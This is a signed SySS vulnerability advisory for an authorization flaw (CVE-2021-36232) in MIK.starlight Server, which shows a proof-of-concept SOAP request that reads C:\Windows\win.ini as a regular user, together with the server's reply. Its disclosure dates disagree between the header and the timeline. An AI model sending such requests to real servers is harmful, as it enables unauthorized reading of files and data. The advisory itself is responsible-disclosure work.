-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2021-036
Product:                   MIK.starlight Server
Manufacturer:              MIK GmbH
Affected Version(s):       -
Tested Version(s):         7.9.5.24363
Vulnerability Type:        CWE-285: Improper Authorization
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2021-07-02
Solution Date:             -
Public Disclosure:         2021-07-28
CVE Reference:             CVE-2021-36232
Authors of Advisory:       Johannes Eger, Nicola Staller

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The MIK.starlight server is a web server that provides the basis for the 
MIK.starlight suite. 

The manufacturer describes the product as follows (see [1]):

"MIK.starlight suite offers exceptional customisable user interfaces
for data analytics and reporting. With our self-service business 
intelligence solutions, users can easily create their own reports or 
adapt existing ones, freeing up time and ensuring optimum flexibility."

Due to missing authorization checks, regular users can perform actions
reserved for administrative users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The server does not seem to check whether a user is authorized to perform a
certain action. Therefore, any authenticated user can use any function
the endpoint offers.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following request is sent in an attempt to read the contents of
the file C:\Windows\win.ini. Note that the request is issued with a
regular user account:

POST /MikStarLightWCF/MikStarLightWCFService HTTP/1.1
Accept: */*
Accept-Language: de-DE
Content-Length: 731
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IMikStarLightWCFService/AdminGetFirstFileContentByFilePath"
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko
Host: IP:PORT
Pragma: no-cache
Connection: close
Proxy-Connection: Keep-Alive

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <AdminGetFirstFileContentByFilePath xmlns="http://tempuri.org/">
      <sessioninfos xmlns:d4p1="http://schemas.datacontract.org/2004/07/MikStarLightBase.Project" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
        <d4p1:Designer>false</d4p1:Designer>
        <d4p1:Id2>###############</d4p1:Id2>
        <d4p1:MUid i:nil="true" />
        <d4p1:SessionID>#############</d4p1:SessionID>
	<d4p1:UserName>USERNAME</d4p1:UserName>
      </sessioninfos>
      <fileFullPath>C:\Windows\win.ini</fileFullPath>
      <maxSize>1111111</maxSize>
      <shared>true</shared>
    </AdminGetFirstFileContentByFilePath>
  </s:Body>
</s:Envelope>

The server issues a regular response, containing the contents of
the file C:\Windows\win.ini:

HTTP/1.1 200 OK
Content-Length: 1593
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 26 May 2021 08:33:04 GMT
Cache-Control: proxy-revalidate
Connection: close

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><AdminGetFirstFileContentByFilePathResponse xmlns="http://tempuri.org/"><AdminGetFirstFileContentByFilePathResult xmlns:a="http://schemas.datacontract.org/2004/07/MikStarLightBase.Project" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:ActionResults i:nil="true"/><a:ActualSessionID>0</a:ActualSessionID><a:AutoLogin>false</a:AutoLogin><a:BooleanResult>false</a:BooleanResult><a:BooleanResult2>false</a:BooleanResult2><a:CheckOutOK>false</a:CheckOutOK><a:Data>OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0DQpbZm9udHNdDQpbZXh0ZW5zaW9uc10NClttY2kgZXh0ZW5zaW9uc10NCltmaWxlc10NCltNYWlsXQ0KTUFQST0xDQo=</a:Data><a:Data2 i:nil="true"/><a:DataList i:nil="true" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:ElementFavorites i:nil="true"/><a:ErrorList i:nil="true" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:IntResult>0</a:IntResult><a:MikBisDbcState>Initial</a:MikBisDbcState><a:NrFailedActions>0</a:NrFailedActions><a:SerializerTypeResult>PolenterMiniLZO</a:SerializerTypeResult><a:ServerResult>OK</a:ServerResult><a:StringResult i:nil="true"/><a:StringResult2 i:nil="true"/><a:StringResult3 i:nil="true"/><a:StringResults i:nil="true" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Uid i:nil="true"/><a:UpdateNecessary>false</a:UpdateNecessary><a:WarningList i:nil="true" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/></AdminGetFirstFileContentByFilePathResult></AdminGetFirstFileContentByFilePathResponse></s:Body></s:Envelope>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS is not aware of a solution for the described security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-02: Vulnerability reported to manufacturer
2021-08-27: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for MIK.starlight
    https://www.mik.de/starlight-bi-suite-2/
[2] SySS Security Advisory SYSS-2021-036
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-036.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Johannes Eger and Nicola Staller of SySS 
GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x41DD2290
Key Fingerprint: A127 394A F398 B097 2332  637C 9DF3 39F9 41DD 2290 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmEnTxAACgkQnfM5+UHd
IpDq1g//T/NkEZVI5HAZNx+GHEAe6Hk+Bg94Li0vgx+g8eBOJOQotXY0+WyP2qbj
AR8L9AQsOVOyLTmdepPv1xU418qJW2XaQNjOJ3vPHCTsmHyfNdtasZpjQSUZ9IlV
oxMCG+VmV9zY77vGJirVLPjZt4RebvoKyi56hntKZ/HK/rv9NxJw/2eztKsLseUU
ktyMOW7tk/qhhThCWFVHZKY+Na8p2tLlcUEXmCPj/pHpLYkeV1vVGDdMsH5heY9+
m8jXjqORR9/dhvLIe7vAj9+pIwXdPZGmX/Am5Kc4AbzHK8AWQAKN9/VlMC+oKgQ+
E2WT7HhRIiC3sXxkJH9IwlDfmWKIJZuP7zietrM2YUV0g3+y2zUcVDx6IDxmX2uf
NOqgjxa69YjpAE8CqhuU/eNRDNld05ME++xPu09zCqxP1yD1rP2J5NRk6GZG0DEZ
LMhrYd4SMmBZF62fgwTYYfQnH3GukLM6Jf+niXwIXUOI9SI6Abx73ox9CAKcdtfd
r4XIzxGVrWtulIVNVCSpaCELIF8kRgUVXU6M58AYImu3oXAdgcWQFKPrbN8s/hYN
xSZqh7etJMKIdrx4SfCuPybc+vYLMZVRDzOgI93aiqgU8yctmd6R1kqkXvfUh93m
NvV35S9FoBTbckXuZ592teqLgr6wx2B3m7btPA8O52Bp7VKxeOE=
=jqcX
-----END PGP SIGNATURE-----